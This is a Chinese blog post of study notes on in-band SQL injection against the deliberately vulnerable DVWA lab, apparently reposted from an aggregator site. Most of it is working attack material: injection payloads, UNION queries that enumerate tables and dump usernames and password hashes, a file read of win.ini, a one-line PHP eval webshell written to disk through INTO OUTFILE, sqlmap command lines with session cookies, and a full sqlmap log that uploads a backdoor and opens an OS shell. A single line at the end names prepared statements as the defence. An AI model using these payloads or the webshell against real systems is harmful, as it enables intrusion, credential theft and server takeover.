sql回显注入-笔记

Posted 2020-09-19 EnderZhou

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了sql回显注入-笔记相关的知识，希望对你有一定的参考价值。

拼接sql命令查询数据

注释常用于sql注入

# 井号单行注释注意：URL编码 %23

-- 两个减号加空格单行注释

/* */ 注释一个区域

注意！在sql注入遇到单引号被转译的情况可以使用 HEX编码绕过单引号的使用

注入测试poc

1 or 1=1

1‘ or ‘1=1

1" or "1=1

sql注入用法

查看表单字段数（列数）

使用二分法 order by 列数排序

确定回显点 XXX‘ union select 1,2;

http://192.168.3.88/dvwa/vulnerabilities/sqli/

?id=xx‘+union+select+1,2--+

&Submit=Submit#

查看数据库版本存放目录

http://192.168.3.88/dvwa/vulnerabilities/sqli/

?id=xx‘[email protected]@version,@@datadir-- +

&Submit=Submit#

查询数据库用户名和数据库名

select user(),database();

python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "phpSESSID=688ktp48da80a4k0fi2ih64814;security=low" --current-user --current-db

查看表名 select table_name from information_schema.tables where table_schema=‘dvwa‘;

http://192.168.3.88/dvwa/vulnerabilities/sqli/

?id=xx‘+union+select+1,table_name+from+information_schema.tables+where+table_schema=‘dvwa‘-- +

&Submit=Submit#

python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=low" -D dvwa --tables

查看列名 select column_name from information_schema.columns where table_name=‘users‘;

http://192.168.3.88/dvwa/vulnerabilities/sqli/

?id=xx‘+union+select+1,column_name from information_schema.columns where table_name=‘users‘-- +

&Submit=Submit#

python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=low" -D dvwa -T users --columns

查询用户名密码 select user,password from users;

http://192.168.3.88/dvwa/vulnerabilities/sqli/

?id=xx‘+union+select user,password from users-- +

&Submit=Submit#

python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=low" -D dvwa -T users -C "user,password" --dump

文件读取 select load_file(‘c:\\windows\\win.ini‘);

写入一句话webshell

select "<?php @eval($_GET[‘cmd‘]);?>" into outfile ‘c:\\phpStudy\\WWW\\dvwa\\ttt.php‘;

___

__H__

___ ___[‘]_____ ___ ___ {1.1.4.16#dev}

|_ -| . [‘] | .‘| . |

|___|_ [(]_|_|_|__,| _|

|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user‘s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:42:39

[09:42:39] [INFO] resuming back-end DBMS ‘mysql‘

[09:42:39] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)

Payload: id=1‘ OR NOT 1977=1977#&Submit=Submit

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: id=1‘ AND (SELECT 3539 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(3539=3539,1))),0x7178767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- FXCd&Submit=Submit

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind

Payload: id=1‘ AND SLEEP(5)-- peqj&Submit=Submit

Type: UNION query

Title: MySQL UNION query (NULL) - 2 columns

Payload: id=1‘ UNION ALL SELECT NULL,CONCAT(0x716a767171,0x50557565536267736d786d6466746d634a4d6b46466d61764e46484d635941774f6a725371596862,0x7178767171)#&Submit=Submit

---

[09:42:39] [INFO] the back-end DBMS is MySQL

web server operating system: Windows

web application technology: PHP 5.4.45, Apache 2.4.23

back-end DBMS: MySQL >= 5.0

[09:42:39] [INFO] going to use a web backdoor for command prompt

[09:42:39] [INFO] fingerprinting the back-end DBMS operating system

[09:42:39] [INFO] the back-end DBMS operating system is Windows

which web application language does the web server support?

[1] ASP (default)

[2] ASPX

[3] JSP

[4] PHP

> 4

do you want sqlmap to further try to provoke the full path disclosure? [Y/n] n

[09:42:43] [WARNING] unable to automatically retrieve the web server document root

what do you want to use for writable directory?

[1] common location(s) (‘C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/‘) (default)

[2] custom location(s)

[3] custom directory list file

[4] brute force search

> 2

please provide a comma separate list of absolute directory paths: C:\phpStudy\WWW\DVWA

[09:42:51] [WARNING] unable to automatically parse any web server path

[09:42:51] [INFO] trying to upload the file stager on ‘C:/phpStudy/WWW/DVWA/‘ via LIMIT ‘LINES TERMINATED BY‘ method

[09:42:51] [INFO] heuristics detected web page charset ‘ascii‘

[09:42:51] [INFO] the file stager has been successfully uploaded on ‘C:/phpStudy/WWW/DVWA/‘ - http://192.168.3.88:80/DVWA/tmpummkl.php

[09:42:52] [INFO] the backdoor has been successfully uploaded on ‘C:/phpStudy/WWW/DVWA/‘ - http://192.168.3.88:80/DVWA/tmpbhbmv.php

[09:42:52] [INFO] calling OS shell. To quit type ‘x‘ or ‘q‘ and press ENTER

os-shell> dir

do you want to retrieve the command standard output? [Y/n/a] y

[09:42:56] [INFO] heuristics detected web page charset ‘GB2312‘

command standard output:

---

驱动器 C 中的卷是 BOOTCAMP

卷的序列号是 D89B-813F

C:\phpStudy\WWW\DVWA 的目录

2017-05-16 09:42 <DIR> .

2017-05-16 09:42 <DIR> ..

2015-10-05 15:51 500 .htaccess

2015-10-05 15:51 3,845 about.php

2015-10-05 15:51 7,229 CHANGELOG.md

2017-04-25 09:18 <DIR> config

2015-10-05 15:51 33,107 COPYING.txt

2017-04-25 09:18 <DIR> docs

2017-04-25 09:18 <DIR> dvwa

2017-04-25 09:18 <DIR> external

2015-10-05 15:51 1,406 favicon.ico

2017-04-25 09:18 <DIR> hackable

2015-10-05 15:51 895 ids_log.php

2015-10-05 15:51 4,389 index.php

2015-10-05 15:51 1,869 instructions.php

2015-10-05 15:51 3,522 login.php

2015-10-05 15:51 414 logout.php

2015-10-05 15:51 148 php.ini

2015-10-05 15:51 199 phpinfo.php

2015-10-05 15:51 7,651 README.md

2015-10-05 15:51 26 robots.txt

2015-10-05 15:51 4,686 security.php

2015-10-05 15:51 2,364 setup.php

2017-05-04 20:59 466 test.php

2017-05-16 09:42 908 tmpbhbmv.php

2017-05-16 09:42 727 tmpummkl.php

2017-05-15 21:11 29 ttt.php

2017-04-25 09:18 <DIR> vulnerabilities

20 个文件 74,380 字节

8 个目录 18,391,883,776 可用字节

---

os-shell> x

[09:43:02] [INFO] cleaning up the web files uploaded

[09:43:02] [WARNING] HTTP error codes detected during run:

404 (Not Found) - 2 times

[09:43:02] [INFO] fetched data logged to text files under ‘C:\Users\zptxwd\.sqlmap\output\192.168.3.88‘

[*] shutting down at 09:43:03

sqlmap工具自动注入

low

python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=1r06imrpmtlhgg7magi3oos273;security=low"

medium.

注意！在sql注入遇到单引号被转译的情况可以使用 HEX编码绕过单引号的使用

DVWA

正常业务逻辑：根据User ID在数据库内查找信息并回显至web页面

select firstname,surname from XXX where user_id=‘

LOW

使用1‘ or ‘1=1测试发现可行

python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=1r06imrpmtlhgg7magi3oos273;security=low"

medium.

改包修改post参数

1 or 1=1

python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=medium"

python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=medium" -D dvwa -T users -C "user,password" --dump

high

可以发现查询位置与回显位置不一致

python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" -p "id" --cookie "PHPSESSID=dv9h9urfu9bf9udkd7ih6qdbj3;security=high" --second-order "http://192.168.3.88/dvwa/vulnerabilities/sqli/session-input.php#"

防止sql注入：检测id数据类型，预编译绑定ID变量

使用预编译、存储过程

以上是关于sql回显注入-笔记的主要内容，如果未能解决你的问题，请参考以下文章